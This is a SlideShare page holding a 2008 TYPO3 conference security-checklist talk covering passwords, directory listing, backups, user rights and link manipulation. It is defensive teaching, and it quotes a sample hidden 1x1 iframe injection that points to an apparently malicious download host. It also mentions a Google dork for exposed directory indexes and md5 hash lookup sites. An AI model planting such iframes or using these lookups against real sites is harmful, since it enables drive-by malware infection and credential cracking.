Your SlideShare is downloading. ×
Avoiding the bad guys

Security Checklist for TYPO3
     International TYPO3 Conference
                Berlin, 2008
TYPO3 has quite a good security history...
but ...


• TYPO3 is not „implement and forget“
• Regular checks and updates are required
Secure Passwords

• 9 or more characters
• Mixed upper/lowercase
• Do not use the same password everywhere
• Change regula...
md5.rednoize.com
md5 Hash Lookup
Disable Directory
         Listing
• in httpd.conf change
  Options All Indexes FollowSymLinks
  to
  Options All FollowSy...
Backup Your Data
• Regularly (cronjob)
• Directories: fileadmin, typo3conf, uploads
• Database: mysqldump --opt > filename
•...
also check for

www.domain.com/../system/
        not being accessible
database.sql
md5.rednoize.com
Backend Users
• Editors should NEVER have admin rights
• Check list of BE users for valid entries
• Temporary editors (stu...
FTP Accounts
• Only give access to fileadmin/user_upload/...
When crisis strikes...
• „...the web forum software had an
  unannounced security patch silently
  released by the vendor nine days ago. The
  de...
iframe Attacks
                    <iframe
 src='http://
ccfelomv
    hk.com/
 dl/adv54
2.php' width=1 height=1>
         ...
Link Manipulation

• www.domain.com/
  index.php&L=2&www.badsite.com
• Limit range of linkVars:
  config.linkVars = L(0-4)
Further Information

• TYPO3 Security Cookbook
  available at typo3.org/teams/security/
• TYPO3 announce list
  available ...
Questions ?
Security Checklist for TYPO3
Security Checklist for TYPO3
Security Checklist for TYPO3
Upcoming SlideShare
Loading in...5
×

Security Checklist for TYPO3

3,672

Published on

Security Checklist for TYPO3

Published in: Technology
0 Comments
6 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,672
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
6
Embeds 0
No embeds

No notes for slide

Transcript of "Security Checklist for TYPO3"

  1. 1. Avoiding the bad guys Security Checklist for TYPO3 International TYPO3 Conference Berlin, 2008
  2. 2. TYPO3 has quite a good security history...
  3. 3. but ... • TYPO3 is not „implement and forget“ • Regular checks and updates are required
  4. 4. Secure Passwords • 9 or more characters • Mixed upper/lowercase • Do not use the same password everywhere • Change regularly • Passwords are stored as md5 hash, but...
  5. 5. md5.rednoize.com
  6. 6. md5 Hash Lookup
  7. 7. Disable Directory Listing • in httpd.conf change Options All Indexes FollowSymLinks to Options All FollowSymLinks • Google Search intitle:quot;index ofquot; quot;last modifiedquot; size
  8. 8. Backup Your Data • Regularly (cronjob) • Directories: fileadmin, typo3conf, uploads • Database: mysqldump --opt > filename • Not only for the last one or two days • Copy or download to external media • Verify! • Do not store inside docroot
  9. 9. also check for www.domain.com/../system/ not being accessible
  10. 10. database.sql
  11. 11. md5.rednoize.com
  12. 12. Backend Users • Editors should NEVER have admin rights • Check list of BE users for valid entries • Temporary editors (students, contract workers): set expiration date for account
  13. 13. FTP Accounts • Only give access to fileadmin/user_upload/...
  14. 14. When crisis strikes...
  15. 15. • „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their quot;greetingquot;.“
  16. 16. iframe Attacks <iframe src='http:// ccfelomv hk.com/ dl/adv54 2.php' width=1 height=1> </iframe>
  17. 17. Link Manipulation • www.domain.com/ index.php&L=2&www.badsite.com • Limit range of linkVars: config.linkVars = L(0-4)
  18. 18. Further Information • TYPO3 Security Cookbook available at typo3.org/teams/security/ • TYPO3 announce list available at lists.netfielders.de
  19. 19. Questions ?

×